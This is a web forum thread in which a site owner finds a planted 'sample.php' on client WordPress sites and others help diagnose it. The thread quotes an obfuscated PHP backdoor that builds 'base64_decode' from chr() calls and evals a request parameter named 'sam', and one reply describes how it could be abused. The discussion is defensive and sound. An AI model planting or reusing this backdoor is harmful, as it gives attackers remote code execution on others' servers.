Attack Script via email?

Sounds odd that Amazon would go to the trouble of the "$a = " when all they need to do is
base64_decode($_REQUEST[sam])

And why REQUEST (both POST and GET) ?

Do you know what “sam” is?

surface to air missile?

Google showed it to be Wordpress ‘simple ads manager.’

Also brought up

I took a quick look through Contact 7 and found no “sam”.

“simple ad manager” is likely the vulnerable script.

Seeing as

IMHO it is time to delete that plugin at least until it gets patched.

And if a backdoor has been uploaded to your site, time to backup your database and do a thorough replacement of all folders and files.

Sorry … I meant Google linked ‘sam’ with simple ad manager. I don’t use Simple Ad Manager. But, yeah, it appears as if a start-from-scratch strategy is the best.

What is the PHP chr function used for? What could they gain? I don’t have proprietary information or anything. And I really do not understand the this lead … http://www.hackingwithphp.com/4/7/3/converting-to-and-from-ascii

In this case it is being used to make base64_decode not be easily noticeable.

As for Amazon, no benefit that I can see. Why would they want to hide that if it’s legit?

If a script-kiddie on the other hand, it would make them feel “clever” and it would get by filters that look for the use of that function name as a string.

Irony is that most look for the function name “eval” so it’s moot here. The code will still trigger a red flag.

That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… "Take WHATEVER i put on the URL in the ‘sam’ variable and execute it. Whatever it is. sam = “unlink(index.php)”? Blow up your index file. dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.

Agreed. But not knowing where “sam” is coming from, until determined what to do?

I’m thinking adding a DEFINE for “sam” as a CONSTANT into to the config file might help.

I got several of these emails and went back and looked to see if all of them were looking for ‘sam.’ One was not. It was

<?php =chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval(());

Okay, I run multiple sites for clients and I just

  1. deleted the Wordpress install
  2. used cPanel to protect the directory
  3. Deleted all files in the base directory
  4. waited (I have been having problems with my host’s cpanel directory-password protection option)

I just re-checked site, and there is a ‘sample’ php file on there, and it contains the one line: < … script language=“php”>
$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
eval($a($_REQUEST[sam]));

So email amazon’s spoofer email (stop-spoofing@amazon.com), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (though why the email came to YOU is a good question.)

Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to high-volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the Wordpress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.

Wait… this code was in a file that you didnt create, sitting on your server?

Contact your hosting company again. Tell them their server’s been breached, and they need to do a complete system sweep on all accounts on the box.

Yes, I’m live-chatting with them at this moment. 70% of my client sites have this weird sample.php file on them.

Yes, it could very well be a shell with group affecting every sharing site and not only your site in particular.

The host really needs to know this.

I told the live-chat support person " I am talking with my tech guy and he says my
hosting service needs to do a complete system sweep on all accounts on
the box? Is this correct?" He said he’s requesting a complete scan of that server.

Switch hosts, imo. That’s crazy.

Just thinking a bit on this.

Might it not be the shared server host but you?

i.e. Are all these clients on the same server?
Have you scanned your machine to make sure you aren’t FTP-ing the payload?
Are you sure your password is strong?

This topic was automatically closed 91 days after the last reply. New replies are no longer allowed.